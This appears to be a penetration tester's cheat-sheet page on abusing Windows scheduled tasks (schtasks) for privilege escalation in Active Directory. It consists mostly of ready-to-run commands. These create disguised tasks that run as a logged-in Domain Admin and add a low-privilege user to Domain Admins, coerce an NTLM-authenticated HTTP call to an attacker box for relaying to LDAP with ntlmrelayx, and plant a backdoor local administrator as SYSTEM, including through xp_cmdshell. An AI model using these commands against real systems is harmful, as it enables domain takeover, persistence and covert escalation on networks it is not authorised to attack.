#
schtasks
Can be used for privesc LOL! This article covers it pretty well.
#
Queue up a scheduled net.exe privesc task by abusing a DA who is logged in interactively
Check who's logged in (and look for a DA):
Get-Process -IncludeUserName explorer | Select-Object UserName
Queue up the task:
schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
Depending on the Windows system, sometimes you have to reverse the use of single ticks and quotes above, so, for example:
schtasks /create /tn "TotallyFineTask" /tr "net group 'Domain Admins' lowpriv /add /domain" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
Run it:
schtasks /run /tn "TotallyFineTask"
#
Queue up a scheduled HTTP-based privesc task by abusing a DA who is logged in interactively
This is handy when you want to coerce a logged-in DA to do an HTTP call to your attacking box so you can relay to LDAP with ntlmrelayx:
schtasks /create /tn "TotallyFineNotSus" /tr "powershell.exe IWR http://your-kali-ip -UseDefaultCredentials" /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f
In another window have something like this going:
ntlmrelayx -t ldap://ip.of.a.domaincontroller -debug --escalate-user lowpriv
Then fire the schtask!
schtasks /run /tn "TotallyFineNotSus"
#
Queue up a scheduled task when you have NT AUTHORITY\SYSTEM privileges
Sometimes you might get on a box with NT AUTHORITY\SYSTEM
permissions and have problems running net.exe
to create a back door local admin or add a domain user to a local admin group. In cases like these you can use the scheduled task trick, but this time set the /ru
to be SYSTEM
like so:
schtasks /create /tn "TotallyFineMaintenanceNotABigDeal" /tr "net localgroup administrators SuperSecretLocalAdmin /add" /sc once /st 12:00 /ru SYSTEM /f
TIP
Sometimes escaping single ticks and quotes is hard in xp_cmdshell, so here's another example that works for group shenanigans:
EXEC xp_cmdshell 'schtasks /create /tn "DBMaint" /tr "net group \"Domain Admins\" lowpriv /add /domain" /sc once /st 12:00 /ru "domain\a-domain-admin" /it /f';
#
Get details on when the task last ran
Tells you when it last ran, error codes, etc:
schtasks /query /tn "Sometask" /v /fo LIST
#
Find all tasks that start with certain characters
For example, if you queued up a bunch of tasks that started with DB you could list them with:
EXEC xp_cmdshell 'schtasks /query | findstr /i "DB"';
#
Delete a scheduled task
schtasks /delete /TN "MyTaskName" /F